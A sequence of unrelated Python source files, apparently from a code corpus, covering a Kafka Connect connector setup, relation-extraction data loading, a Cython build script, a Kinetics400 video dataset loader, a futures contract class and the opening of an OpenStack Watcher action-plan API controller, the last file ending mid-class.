# Connect should run this connector (hint: not very often!)
data = json.dumps({"name": CONNECTOR_NAME, "config": config})
resp = requests.post(
KAFKA_CONNECT_URL,
headers={"Content-Type": "application/json"},
data=data,
)
# Ensure a healthy response was given
resp.raise_for_status()
logging.info("-------Connector created successfully-------")
if __name__ == "__main__":
configure_connector()
| 3.109375 | 3 |
liuetal2019/utils.py | wasiahmad/GATE | 24 | 1160 | import io
import logging
import json
import numpy
import torch
import numpy as np
from tqdm import tqdm
from clie.inputters import constant
from clie.objects import Sentence
from torch.utils.data import Dataset
from torch.utils.data.sampler import Sampler
logger = logging.getLogger(__name__)
def load_word_embeddings(file):
embeddings_index = {}
fin = io.open(file, 'r', encoding='utf-8', newline='\n', errors='ignore')
n, d = map(int, fin.readline().split())
for i, line in tqdm(enumerate(fin), total=n):
tokens = line.rstrip().split(' ')
v = numpy.array(tokens[1:], dtype=float)
embeddings_index[tokens[0]] = v
return embeddings_index
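# The loader above expects a fastText-style .vec text file: the first line holds
# "<vocab_size> <dim>", and every following line holds a token and its vector,
# e.g. (illustrative):
#   2 3
#   hello 0.1 0.2 0.3
#   world 0.4 0.5 0.6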
# ------------------------------------------------------------------------------
# Data loading
# ------------------------------------------------------------------------------
def load_data(filename, src_lang, tgt_lang, knn_file,
knn_size, max_examples=-1):
examples = []
wrong_subj_pos, wrong_obj_pos = 0, 0
with open(filename) as f:
data = json.load(f)
knn_dict = None
if knn_file:
with open(knn_file) as f:
knn_dict = json.load(f)
for idx, ex in enumerate(tqdm(data, total=len(data))):
sentence = Sentence(ex['id'])
sentence.language = src_lang
sentence.words = ex['token']
sentence.pos = ex['stanford_pos']
sentence.ner = ex['stanford_ner']
sentence.deprel = ex['stanford_deprel']
sentence.head = [int(x) for x in ex['stanford_head']]
sentence.subj_type = ex['subj_type']
sentence.obj_type = ex['obj_type']
sentence.relation = ex['relation']
if ex['subj_end'] - ex['subj_start'] < 0:
# we swap the start and end index
wrong_subj_pos += 1
sentence.subject = [ex['subj_end'], ex['subj_start']]
else:
sentence.subject = [ex['subj_start'], ex['subj_end']]
if ex['obj_end'] - ex['obj_start'] < 0:
# we swap the start and end index
wrong_obj_pos += 1
sentence.object = [ex['obj_end'], ex['obj_start']]
else:
sentence.object = [ex['obj_start'], ex['obj_end']]
# store KNN word info
if knn_dict:
sentence.tgt_lang = tgt_lang
knn_words = []
for w in ex['token']:
w = '!{}_{}'.format(src_lang, w)
if w in knn_dict:
assert len(knn_dict[w]) == knn_size
knn_words.append(knn_dict[w])
else:
knn_words.append([constant.UNK_WORD] * knn_size)
sentence.knn_words = knn_words
examples.append(sentence)
if max_examples != -1 and len(examples) > max_examples:
break
if wrong_subj_pos > 0 or wrong_obj_pos > 0:
logger.info('{} and {} wrong subject and object positions found!'.format(
wrong_subj_pos, wrong_obj_pos))
return examples
def vectorize(ex, model, iseval):
"""Torchify a single example."""
words = ['!{}_{}'.format(ex.language, w) for w in ex.words]
words = [model.word_dict[w] for w in words]
knn_word = None
if ex.knn_words:
knn_word = [[model.word_dict[w] for w in knn]
for knn in ex.knn_words]
knn_word = torch.LongTensor(knn_word)
word = torch.LongTensor(words)
pos = torch.LongTensor([model.pos_dict[p] for p in ex.pos])
ner = torch.LongTensor([model.ner_dict[n] for n in ex.ner])
deprel = torch.LongTensor([model.deprel_dict[d] for d in ex.deprel])
assert any([x == 0 for x in ex.head])
head = torch.LongTensor(ex.head)
subj_position = torch.LongTensor(ex.subj_position)
obj_position = torch.LongTensor(ex.obj_position)
type = [0] * len(ex.words)
ttype = model.type_dict[ex.subj_type]
start, end = ex.subject
type[start: end + 1] = [ttype] * (end - start + 1)
atype = model.type_dict[ex.obj_type]
start, end = ex.object
type[start: end + 1] = [atype] * (end - start + 1)
type = torch.LongTensor(type)
return {
'id': ex.id,
'language': ex.language,
'word': word,
'pos': pos,
'ner': ner,
'deprel': deprel,
'type': type,
'head': head,
'subject': ex.subj_text,
'object': ex.obj_text,
'subject_pos': subj_position,
'object_pos': obj_position,
'relation': model.label_dict[ex.relation],
'knn_word': knn_word
}
def batchify(batch):
"""Gather a batch of individual examples into one batch."""
# batch is a list of vectorized examples
batch_size = len(batch)
ids = [ex['id'] for ex in batch]
language = [ex['language'] for ex in batch]
use_knn = batch[0]['knn_word'] is not None
# NOTE. batch[0]['knn_word'] is a 2d list
knn_size = len(batch[0]['knn_word'][0]) if use_knn else 0
# --------- Prepare Code tensors ---------
max_len = max([ex['word'].size(0) for ex in batch])
# Batch Code Representations
len_rep = torch.LongTensor(batch_size).fill_(constant.PAD)
word_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
head_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
subject_pos_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
object_pos_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
pos_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
ner_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
deprel_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
type_rep = torch.LongTensor(batch_size, max_len).fill_(constant.PAD)
labels = torch.LongTensor(batch_size)
subject = []
object = []
knn_rep = None
if use_knn:
knn_rep = torch.LongTensor(batch_size, max_len, knn_size).fill_(constant.PAD)
for i, ex in enumerate(batch):
len_rep[i] = ex['word'].size(0)
labels[i] = ex['relation']
word_rep[i, :len_rep[i]] = ex['word']
head_rep[i, :len_rep[i]] = ex['head']
subject_pos_rep[i, :len_rep[i]] = ex['subject_pos']
object_pos_rep[i, :len_rep[i]] = ex['object_pos']
pos_rep[i, :len_rep[i]] = ex['pos']
ner_rep[i, :len_rep[i]] = ex['ner']
deprel_rep[i, :len_rep[i]] = ex['deprel']
type_rep[i, :len_rep[i]] = ex['type']
subject.append(ex['subject'])
object.append(ex['object'])
if use_knn:
knn_rep[i, :len_rep[i]] = ex['knn_word']
return {
'ids': ids,
'language': language,
'batch_size': batch_size,
'len_rep': len_rep,
'word_rep': word_rep,
'knn_rep': knn_rep,
'head_rep': head_rep,
'subject': subject,
'object': object,
'subject_pos_rep': subject_pos_rep,
'object_pos_rep': object_pos_rep,
'labels': labels,
'pos_rep': pos_rep,
'ner_rep': ner_rep,
'deprel_rep': deprel_rep,
'type_rep': type_rep
}
class ACE05Dataset(Dataset):
def __init__(self, examples, model, evaluation=False):
self.model = model
self.examples = examples
self.evaluation = evaluation
def __len__(self):
return len(self.examples)
def __getitem__(self, index):
return vectorize(self.examples[index], self.model,
iseval=self.evaluation)
def lengths(self):
return [len(ex.words) for ex in self.examples]
class SortedBatchSampler(Sampler):
def __init__(self, lengths, batch_size, shuffle=True):
self.lengths = lengths
self.batch_size = batch_size
self.shuffle = shuffle
def __iter__(self):
lengths = np.array(
[(-l, np.random.random()) for l in self.lengths],
dtype=[('l1', np.int_), ('rand', np.float_)]
)
indices = np.argsort(lengths, order=('l1', 'rand'))
batches = [indices[i:i + self.batch_size]
for i in range(0, len(indices), self.batch_size)]
if self.shuffle:
np.random.shuffle(batches)
return iter([i for batch in batches for i in batch])
def __len__(self):
return len(self.lengths)
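# Illustrative wiring (added sketch; constructing `model` and `examples` is not
# shown here): the pieces above can be combined roughly as
#
#     dataset = ACE05Dataset(examples, model)
#     sampler = SortedBatchSampler(dataset.lengths(), batch_size=32)
#     loader = torch.utils.data.DataLoader(dataset, batch_size=32,
#                                          sampler=sampler, collate_fn=batchify)
#     for batch in loader:
#         ...  # e.g. batch['word_rep'], batch['labels']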
| 2.3125 | 2 |
build.py | dnanexus/IndexTools | 15 | 1161 | from distutils.extension import Extension
cmdclass = {}
try:
# with Cython
from Cython.Build import build_ext
cmdclass["build_ext"] = build_ext
module_src = "cgranges/python/cgranges.pyx"
except ImportError: # without Cython
module_src = "cgranges/python/cgranges.c"
def build(setup_kwargs):
"""
This function is mandatory in order to build the extensions.
"""
setup_kwargs.update(
{
"ext_modules": [
Extension(
"cgranges",
sources=[module_src, "cgranges/cgranges.c"],
depends=[
"cgranges/cgranges.h",
"cgranges/khash.h",
"cgranges/python/cgranges.pyx"
],
include_dirs=["cgranges"]
)
],
"cmdclass": cmdclass
}
)
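# Note (added, hedged): this module follows the Poetry custom build-script
# convention, where pyproject.toml points at it (e.g. `build = "build.py"`) and
# Poetry calls build(setup_kwargs) itself, mutating setup_kwargs in place; the
# exact pyproject.toml wiring is an assumption, as it is not shown here.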
| 1.976563 | 2 |
icarus/models/service/__init__.py | oascigil/icarus_edge_comp | 5 | 1162 | <filename>icarus/models/service/__init__.py<gh_stars>1-10
# -*- coding: utf-8 -*-
from .compSpot import *
| 1.023438 | 1 |
gluoncv/data/kinetics400/classification.py | YvetteGuo/gluon-cv | 1 | 1163 | <reponame>YvetteGuo/gluon-cv<filename>gluoncv/data/kinetics400/classification.py
# pylint: disable=line-too-long,too-many-lines,missing-docstring
"""Kinetics400 action classification dataset."""
import os
import random
import numpy as np
from mxnet import nd
from mxnet.gluon.data import dataset
__all__ = ['Kinetics400']
class Kinetics400(dataset.Dataset):
"""Load the Kinetics400 action recognition dataset.
Refer to :doc:`../build/examples_datasets/kinetics400` for the description of
this dataset and how to prepare it.
Parameters
----------
root : str, default '~/.mxnet/datasets/kinetics400'
Path to the folder stored the dataset.
setting : str, required
Config file of the prepared dataset.
train : bool, default True
Whether to load the training or validation set.
test_mode : bool, default False
Whether to perform evaluation on the test set
name_pattern : str, default None
The naming pattern of the decoded video frames.
For example, img_00012.jpg
is_color : bool, default True
Whether the loaded image is color or grayscale
modality : str, default 'rgb'
Input modalities, we support only rgb video frames for now.
Will add support for rgb difference image and optical flow image later.
num_segments : int, default 1
Number of segments to evenly divide the video into clips.
A useful technique to obtain global video-level information.
        <NAME>, et al., Temporal Segment Networks: Towards Good Practices for Deep Action Recognition, ECCV 2016
new_length : int, default 1
The length of input video clip. Default is a single image, but it can be multiple video frames.
For example, new_length=16 means we will extract a video clip of consecutive 16 frames.
new_width : int, default 340
Scale the width of loaded image to 'new_width' for later multiscale cropping and resizing.
new_height : int, default 256
Scale the height of loaded image to 'new_height' for later multiscale cropping and resizing.
target_width : int, default 224
Scale the width of transformed image to the same 'target_width' for batch forwarding.
target_height : int, default 224
Scale the height of transformed image to the same 'target_height' for batch forwarding.
transform : function, default None
A function that takes data and label and transforms them.
"""
def __init__(self,
setting=os.path.expanduser('~/.mxnet/datasets/kinetics400/kinetics400_train_list_rawframes.txt'),
root=os.path.expanduser('~/.mxnet/datasets/kinetics400/rawframes_train'),
train=True,
test_mode=False,
name_pattern=None,
is_color=True,
modality='rgb',
num_segments=1,
new_length=1,
new_width=340,
new_height=256,
target_width=224,
target_height=224,
transform=None):
super(Kinetics400, self).__init__()
self.root = root
self.setting = setting
self.train = train
self.test_mode = test_mode
self.is_color = is_color
self.modality = modality
self.num_segments = num_segments
self.new_height = new_height
self.new_width = new_width
self.target_height = target_height
self.target_width = target_width
self.new_length = new_length
self.transform = transform
self.classes, self.class_to_idx = self._find_classes(root)
self.clips = self._make_dataset(root, setting)
if len(self.clips) == 0:
raise(RuntimeError("Found 0 video clips in subfolders of: " + root + "\n"
"Check your data directory (opt.data-dir)."))
if name_pattern:
self.name_pattern = name_pattern
else:
if self.modality == "rgb":
self.name_pattern = "img_%05d.jpg"
elif self.modality == "flow":
self.name_pattern = "flow_%s_%05d.jpg"
def __getitem__(self, index):
directory, duration, target = self.clips[index]
average_duration = int(duration / self.num_segments)
offsets = []
for seg_id in range(self.num_segments):
if self.train and not self.test_mode:
# training
if average_duration >= self.new_length:
offset = random.randint(0, average_duration - self.new_length)
                    # No +1 because randint(a, b) returns a random integer N such that a <= N <= b.
offsets.append(offset + seg_id * average_duration)
else:
offsets.append(0)
elif not self.train and not self.test_mode:
# validation
if average_duration >= self.new_length:
offsets.append(int((average_duration - self.new_length + 1)/2 + seg_id * average_duration))
else:
offsets.append(0)
else:
# test
if average_duration >= self.new_length:
offsets.append(int((average_duration - self.new_length + 1)/2 + seg_id * average_duration))
else:
offsets.append(0)
clip_input = self._TSN_RGB(directory, offsets, self.new_height, self.new_width, self.new_length, self.is_color, self.name_pattern)
if self.transform is not None:
clip_input = self.transform(clip_input)
if self.num_segments > 1 and not self.test_mode:
# For TSN training, reshape the input to B x 3 x H x W. Here, B = batch_size * num_segments
clip_input = clip_input.reshape((-1, 3 * self.new_length, self.target_height, self.target_width))
return clip_input, target
def __len__(self):
return len(self.clips)
def _find_classes(self, directory):
classes = [d for d in os.listdir(directory) if os.path.isdir(os.path.join(directory, d))]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def _make_dataset(self, directory, setting):
if not os.path.exists(setting):
raise(RuntimeError("Setting file %s doesn't exist. Check opt.train-list and opt.val-list. " % (setting)))
clips = []
with open(setting) as split_f:
data = split_f.readlines()
for line in data:
line_info = line.split()
# line format: video_path, video_duration, video_label
if len(line_info) < 3:
print('Video input format is not correct, missing one or more element. %s' % line)
continue
clip_path = os.path.join(directory, line_info[0])
duration = int(line_info[1])
target = int(line_info[2])
item = (clip_path, duration, target)
clips.append(item)
return clips
def _TSN_RGB(self, directory, offsets, new_height, new_width, new_length, is_color, name_pattern):
from ...utils.filesystem import try_import_cv2
cv2 = try_import_cv2()
if is_color:
cv_read_flag = cv2.IMREAD_COLOR
else:
cv_read_flag = cv2.IMREAD_GRAYSCALE
interpolation = cv2.INTER_LINEAR
sampled_list = []
for _, offset in enumerate(offsets):
for length_id in range(1, new_length+1):
frame_name = name_pattern % (length_id + offset)
frame_path = directory + "/" + frame_name
cv_img_origin = cv2.imread(frame_path, cv_read_flag)
if cv_img_origin is None:
raise(RuntimeError("Could not load file %s. Check data path." % (frame_path)))
if new_width > 0 and new_height > 0:
cv_img = cv2.resize(cv_img_origin, (new_width, new_height), interpolation)
else:
cv_img = cv_img_origin
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
sampled_list.append(cv_img)
# the shape of clip_input will be H x W x C, and C = num_segments * new_length * 3
clip_input = np.concatenate(sampled_list, axis=2)
return nd.array(clip_input)
class Kinetics400Attr(object):
def __init__(self):
self.num_class = 400
self.classes = ['abseiling', 'air_drumming', 'answering_questions', 'applauding', 'applying_cream', 'archery',
'arm_wrestling', 'arranging_flowers', 'assembling_computer', 'auctioning', 'baby_waking_up', 'baking_cookies',
'balloon_blowing', 'bandaging', 'barbequing', 'bartending', 'beatboxing', 'bee_keeping', 'belly_dancing',
'bench_pressing', 'bending_back', 'bending_metal', 'biking_through_snow', 'blasting_sand', 'blowing_glass',
'blowing_leaves', 'blowing_nose', 'blowing_out_candles', 'bobsledding', 'bookbinding', 'bouncing_on_trampoline',
'bowling', 'braiding_hair', 'breading_or_breadcrumbing', 'breakdancing', 'brush_painting', 'brushing_hair',
'brushing_teeth', 'building_cabinet', 'building_shed', 'bungee_jumping', 'busking', 'canoeing_or_kayaking',
'capoeira', 'carrying_baby', 'cartwheeling', 'carving_pumpkin', 'catching_fish', 'catching_or_throwing_baseball',
'catching_or_throwing_frisbee', 'catching_or_throwing_softball', 'celebrating', 'changing_oil', 'changing_wheel',
'checking_tires', 'cheerleading', 'chopping_wood', 'clapping', 'clay_pottery_making', 'clean_and_jerk',
'cleaning_floor', 'cleaning_gutters', 'cleaning_pool', 'cleaning_shoes', 'cleaning_toilet', 'cleaning_windows',
'climbing_a_rope', 'climbing_ladder', 'climbing_tree', 'contact_juggling', 'cooking_chicken', 'cooking_egg',
'cooking_on_campfire', 'cooking_sausages', 'counting_money', 'country_line_dancing', 'cracking_neck', 'crawling_baby',
'crossing_river', 'crying', 'curling_hair', 'cutting_nails', 'cutting_pineapple', 'cutting_watermelon',
'dancing_ballet', 'dancing_charleston', 'dancing_gangnam_style', 'dancing_macarena', 'deadlifting',
'decorating_the_christmas_tree', 'digging', 'dining', 'disc_golfing', 'diving_cliff', 'dodgeball', 'doing_aerobics',
'doing_laundry', 'doing_nails', 'drawing', 'dribbling_basketball', 'drinking', 'drinking_beer', 'drinking_shots',
'driving_car', 'driving_tractor', 'drop_kicking', 'drumming_fingers', 'dunking_basketball', 'dying_hair',
'eating_burger', 'eating_cake', 'eating_carrots', 'eating_chips', 'eating_doughnuts', 'eating_hotdog',
'eating_ice_cream', 'eating_spaghetti', 'eating_watermelon', 'egg_hunting', 'exercising_arm',
'exercising_with_an_exercise_ball', 'extinguishing_fire', 'faceplanting', 'feeding_birds', 'feeding_fish',
'feeding_goats', 'filling_eyebrows', 'finger_snapping', 'fixing_hair', 'flipping_pancake', 'flying_kite',
'folding_clothes', 'folding_napkins', 'folding_paper', 'front_raises', 'frying_vegetables', 'garbage_collecting',
'gargling', 'getting_a_haircut', 'getting_a_tattoo', 'giving_or_receiving_award', 'golf_chipping', 'golf_driving',
'golf_putting', 'grinding_meat', 'grooming_dog', 'grooming_horse', 'gymnastics_tumbling', 'hammer_throw',
'headbanging', 'headbutting', 'high_jump', 'high_kick', 'hitting_baseball', 'hockey_stop', 'holding_snake',
'hopscotch', 'hoverboarding', 'hugging', 'hula_hooping', 'hurdling', 'hurling_-sport-', 'ice_climbing', 'ice_fishing',
'ice_skating', 'ironing', 'javelin_throw', 'jetskiing', 'jogging', 'juggling_balls', 'juggling_fire',
'juggling_soccer_ball', 'jumping_into_pool', 'jumpstyle_dancing', 'kicking_field_goal', 'kicking_soccer_ball',
'kissing', 'kitesurfing', 'knitting', 'krumping', 'laughing', 'laying_bricks', 'long_jump', 'lunge', 'making_a_cake',
'making_a_sandwich', 'making_bed', 'making_jewelry', 'making_pizza', 'making_snowman', 'making_sushi', 'making_tea',
'marching', 'massaging_back', 'massaging_feet', 'massaging_legs', "massaging_person's_head", 'milking_cow',
'mopping_floor', 'motorcycling', 'moving_furniture', 'mowing_lawn', 'news_anchoring', 'opening_bottle',
'opening_present', 'paragliding', 'parasailing', 'parkour', 'passing_American_football_-in_game-',
'passing_American_football_-not_in_game-', 'peeling_apples', 'peeling_potatoes', 'petting_animal_-not_cat-',
'petting_cat', 'picking_fruit', 'planting_trees', 'plastering', 'playing_accordion', 'playing_badminton',
'playing_bagpipes', 'playing_basketball', 'playing_bass_guitar', 'playing_cards', 'playing_cello', 'playing_chess',
'playing_clarinet', 'playing_controller', 'playing_cricket', 'playing_cymbals', 'playing_didgeridoo', 'playing_drums',
'playing_flute', 'playing_guitar', 'playing_harmonica', 'playing_harp', 'playing_ice_hockey', 'playing_keyboard',
'playing_kickball', 'playing_monopoly', 'playing_organ', 'playing_paintball', 'playing_piano', 'playing_poker',
'playing_recorder', 'playing_saxophone', 'playing_squash_or_racquetball', 'playing_tennis', 'playing_trombone',
'playing_trumpet', 'playing_ukulele', 'playing_violin', 'playing_volleyball', 'playing_xylophone', 'pole_vault',
'presenting_weather_forecast', 'pull_ups', 'pumping_fist', 'pumping_gas', 'punching_bag', 'punching_person_-boxing-',
'push_up', 'pushing_car', 'pushing_cart', 'pushing_wheelchair', 'reading_book', 'reading_newspaper', 'recording_music',
'riding_a_bike', 'riding_camel', 'riding_elephant', 'riding_mechanical_bull', 'riding_mountain_bike', 'riding_mule',
'riding_or_walking_with_horse', 'riding_scooter', 'riding_unicycle', 'ripping_paper', 'robot_dancing', 'rock_climbing',
'rock_scissors_paper', 'roller_skating', 'running_on_treadmill', 'sailing', 'salsa_dancing', 'sanding_floor',
'scrambling_eggs', 'scuba_diving', 'setting_table', 'shaking_hands', 'shaking_head', 'sharpening_knives',
'sharpening_pencil', 'shaving_head', 'shaving_legs', 'shearing_sheep', 'shining_shoes', 'shooting_basketball',
'shooting_goal_-soccer-', 'shot_put', 'shoveling_snow', 'shredding_paper', 'shuffling_cards', 'side_kick',
'sign_language_interpreting', 'singing', 'situp', 'skateboarding', 'ski_jumping', 'skiing_-not_slalom_or_crosscountry-',
'skiing_crosscountry', 'skiing_slalom', 'skipping_rope', 'skydiving', 'slacklining', 'slapping', 'sled_dog_racing',
'smoking', 'smoking_hookah', 'snatch_weight_lifting', 'sneezing', 'sniffing', 'snorkeling', 'snowboarding', 'snowkiting',
'snowmobiling', 'somersaulting', 'spinning_poi', 'spray_painting', 'spraying', 'springboard_diving', 'squat',
'sticking_tongue_out', 'stomping_grapes', 'stretching_arm', 'stretching_leg', 'strumming_guitar', 'surfing_crowd',
'surfing_water', 'sweeping_floor', 'swimming_backstroke', 'swimming_breast_stroke', 'swimming_butterfly_stroke',
'swing_dancing', 'swinging_legs', 'swinging_on_something', 'sword_fighting', 'tai_chi', 'taking_a_shower', 'tango_dancing',
'tap_dancing', 'tapping_guitar', 'tapping_pen', 'tasting_beer', 'tasting_food', 'testifying', 'texting', 'throwing_axe',
'throwing_ball', 'throwing_discus', 'tickling', 'tobogganing', 'tossing_coin', 'tossing_salad', 'training_dog',
'trapezing', 'trimming_or_shaving_beard', 'trimming_trees', 'triple_jump', 'tying_bow_tie', 'tying_knot_-not_on_a_tie-',
'tying_tie', 'unboxing', 'unloading_truck', 'using_computer', 'using_remote_controller_-not_gaming-', 'using_segway',
'vault', 'waiting_in_line', 'walking_the_dog', 'washing_dishes', 'washing_feet', 'washing_hair', 'washing_hands',
'water_skiing', 'water_sliding', 'watering_plants', 'waxing_back', 'waxing_chest', 'waxing_eyebrows', 'waxing_legs',
'weaving_basket', 'welding', 'whistling', 'windsurfing', 'wrapping_present', 'wrestling', 'writing', 'yawning', 'yoga', 'zumba']
| 2.71875 | 3 |
qf_lib/containers/futures/future_contract.py | webclinic017/qf-lib | 198 | 1164 | # Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from qf_lib.common.tickers.tickers import Ticker
from qf_lib.containers.dataframe.prices_dataframe import PricesDataFrame
class FutureContract(object):
""" Class representing a single future contract.
The FutureContract is a simple class representing one futures contract. The FutureContract objects are used by the
FuturesChain, in order to provide the contracts chaining possibilities. It requires 3 parameters: ticker, which is
the symbol of the specific future contract (e.g. BloombergFutureTicker(“CTZ9 Comdty”)), expiration date of the
contract and a PricesDataFrame, containing dates with price field values.
Parameters
----------
ticker: Ticker
symbol of the future contract
exp_date: datetime
expiration date
data: PricesDataFrame
data frame containing dates with price fields values
"""
def __init__(self, ticker: Ticker, exp_date: datetime, data: PricesDataFrame):
self.ticker = ticker
self.exp_date = exp_date
self.data = data
def __str__(self):
return 'Contract: ticker: {}, expiration date: {}'.format(
self.ticker, self.exp_date)
def __eq__(self, other):
if self is other:
return True
if not isinstance(other, FutureContract):
return False
return (self.ticker, self.exp_date, self.data) == (other.ticker, other.exp_date, other.data)
def __hash__(self):
return hash((self.ticker, self.exp_date, self.data))
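# --- Usage sketch (illustrative; not part of the original file) ---
# `some_future_ticker` and `prices_dataframe` are placeholders that, in real
# code, would come from qf-lib tickers and data providers.
#
#   contract = FutureContract(ticker=some_future_ticker,
#                             exp_date=datetime(2021, 12, 17),
#                             data=prices_dataframe)
#   print(contract)   # -> Contract: ticker: ..., expiration date: 2021-12-17 ...
#   # equality (and hashing) is based on (ticker, exp_date, data)
#   assert contract == FutureContract(some_future_ticker,
#                                     datetime(2021, 12, 17),
#                                     prices_dataframe)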
| 2.4375 | 2 |
watcher/api/controllers/v1/action_plan.py | ajaytikoo/watcher | 64 | 1165 | <reponame>ajaytikoo/watcher
# -*- encoding: utf-8 -*-
# Copyright 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An :ref:`Action Plan <action_plan_definition>` specifies a flow of
:ref:`Actions <action_definition>` that should be executed in order to satisfy
a given :ref:`Goal <goal_definition>`. It also contains an estimated
:ref:`global efficacy <efficacy_definition>` alongside a set of
:ref:`efficacy indicators <efficacy_indicator_definition>`.
An :ref:`Action Plan <action_plan_definition>` is generated by Watcher when an
:ref:`Audit <audit_definition>` is successful which implies that the
:ref:`Strategy <strategy_definition>`
which was used has found a :ref:`Solution <solution_definition>` to achieve the
:ref:`Goal <goal_definition>` of this :ref:`Audit <audit_definition>`.
In the default implementation of Watcher, an action plan is composed of
a list of successive :ref:`Actions <action_definition>` (i.e., a Workflow of
:ref:`Actions <action_definition>` belonging to a unique branch).
However, Watcher provides abstract interfaces for many of its components,
allowing other implementations to generate and handle more complex :ref:`Action
Plan(s) <action_plan_definition>` composed of two types of Action Item(s):
- simple :ref:`Actions <action_definition>`: atomic tasks, which means it
can not be split into smaller tasks or commands from an OpenStack point of
view.
- composite Actions: which are composed of several simple
:ref:`Actions <action_definition>`
ordered in sequential and/or parallel flows.
An :ref:`Action Plan <action_plan_definition>` may be described using
standard workflow model description formats such as
`Business Process Model and Notation 2.0 (BPMN 2.0)
<http://www.omg.org/spec/BPMN/2.0/>`_ or `Unified Modeling Language (UML)
<http://www.uml.org/>`_.
To see the life-cycle and description of
:ref:`Action Plan <action_plan_definition>` states, visit :ref:`the Action Plan
state machine <action_plan_state_machine>`.
"""
import datetime
from http import HTTPStatus
from oslo_log import log
import pecan
from pecan import rest
import wsme
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from watcher._i18n import _
from watcher.api.controllers import base
from watcher.api.controllers import link
from watcher.api.controllers.v1 import collection
from watcher.api.controllers.v1 import efficacy_indicator as efficacyindicator
from watcher.api.controllers.v1 import types
from watcher.api.controllers.v1 import utils as api_utils
from watcher.applier import rpcapi
from watcher.common import exception
from watcher.common import policy
from watcher.common import utils
from watcher import objects
from watcher.objects import action_plan as ap_objects
LOG = log.getLogger(__name__)
def hide_fields_in_newer_versions(obj):
"""This method hides fields that were added in newer API versions.
Certain node fields were introduced at certain API versions.
These fields are only made available when the request's API version
matches or exceeds the versions when these fields were introduced.
"""
pass
class ActionPlanPatchType(types.JsonPatchType):
@staticmethod
def _validate_state(patch):
serialized_patch = {'path': patch.path, 'op': patch.op}
if patch.value is not wtypes.Unset:
serialized_patch['value'] = patch.value
# todo: use state machines to handle state transitions
state_value = patch.value
if state_value and not hasattr(ap_objects.State, state_value):
msg = _("Invalid state: %(state)s")
raise exception.PatchError(
patch=serialized_patch, reason=msg % dict(state=state_value))
@staticmethod
def validate(patch):
if patch.path == "/state":
ActionPlanPatchType._validate_state(patch)
return types.JsonPatchType.validate(patch)
@staticmethod
def internal_attrs():
return types.JsonPatchType.internal_attrs()
@staticmethod
def mandatory_attrs():
return ["audit_id", "state"]
class ActionPlan(base.APIBase):
"""API representation of a action plan.
This class enforces type checking and value constraints, and converts
between the internal object model and the API representation of an
action plan.
"""
_audit_uuid = None
_strategy_uuid = None
_strategy_name = None
_efficacy_indicators = None
def _get_audit_uuid(self):
return self._audit_uuid
def _set_audit_uuid(self, value):
if value == wtypes.Unset:
self._audit_uuid = wtypes.Unset
elif value and self._audit_uuid != value:
try:
audit = objects.Audit.get(pecan.request.context, value)
self._audit_uuid = audit.uuid
self.audit_id = audit.id
except exception.AuditNotFound:
self._audit_uuid = None
def _get_efficacy_indicators(self):
if self._efficacy_indicators is None:
self._set_efficacy_indicators(wtypes.Unset)
return self._efficacy_indicators
def _set_efficacy_indicators(self, value):
efficacy_indicators = []
if value == wtypes.Unset and not self._efficacy_indicators:
try:
_efficacy_indicators = objects.EfficacyIndicator.list(
pecan.request.context,
filters={"action_plan_uuid": self.uuid})
for indicator in _efficacy_indicators:
efficacy_indicator = efficacyindicator.EfficacyIndicator(
context=pecan.request.context,
name=indicator.name,
description=indicator.description,
unit=indicator.unit,
value=float(indicator.value),
)
efficacy_indicators.append(efficacy_indicator.as_dict())
self._efficacy_indicators = efficacy_indicators
except exception.EfficacyIndicatorNotFound as exc:
LOG.exception(exc)
elif value and self._efficacy_indicators != value:
self._efficacy_indicators = value
def _get_strategy(self, value):
if value == wtypes.Unset:
return None
strategy = None
try:
if utils.is_uuid_like(value) or utils.is_int_like(value):
strategy = objects.Strategy.get(
pecan.request.context, value)
else:
strategy = objects.Strategy.get_by_name(
pecan.request.context, value)
except exception.StrategyNotFound:
pass
if strategy:
self.strategy_id = strategy.id
return strategy
def _get_strategy_uuid(self):
return self._strategy_uuid
def _set_strategy_uuid(self, value):
if value and self._strategy_uuid != value:
self._strategy_uuid = None
strategy = self._get_strategy(value)
if strategy:
self._strategy_uuid = strategy.uuid
def _get_strategy_name(self):
return self._strategy_name
def _set_strategy_name(self, value):
if value and self._strategy_name != value:
self._strategy_name = None
strategy = self._get_strategy(value)
if strategy:
self._strategy_name = strategy.name
uuid = wtypes.wsattr(types.uuid, readonly=True)
"""Unique UUID for this action plan"""
audit_uuid = wtypes.wsproperty(types.uuid, _get_audit_uuid,
_set_audit_uuid,
mandatory=True)
"""The UUID of the audit this port belongs to"""
strategy_uuid = wtypes.wsproperty(
wtypes.text, _get_strategy_uuid, _set_strategy_uuid, mandatory=False)
"""Strategy UUID the action plan refers to"""
strategy_name = wtypes.wsproperty(
wtypes.text, _get_strategy_name, _set_strategy_name, mandatory=False)
"""The name of the strategy this action plan refers to"""
efficacy_indicators = wtypes.wsproperty(
types.jsontype, _get_efficacy_indicators, _set_efficacy_indicators,
mandatory=True)
"""The list of efficacy indicators associated to this action plan"""
global_efficacy = wtypes.wsattr(types.jsontype, readonly=True)
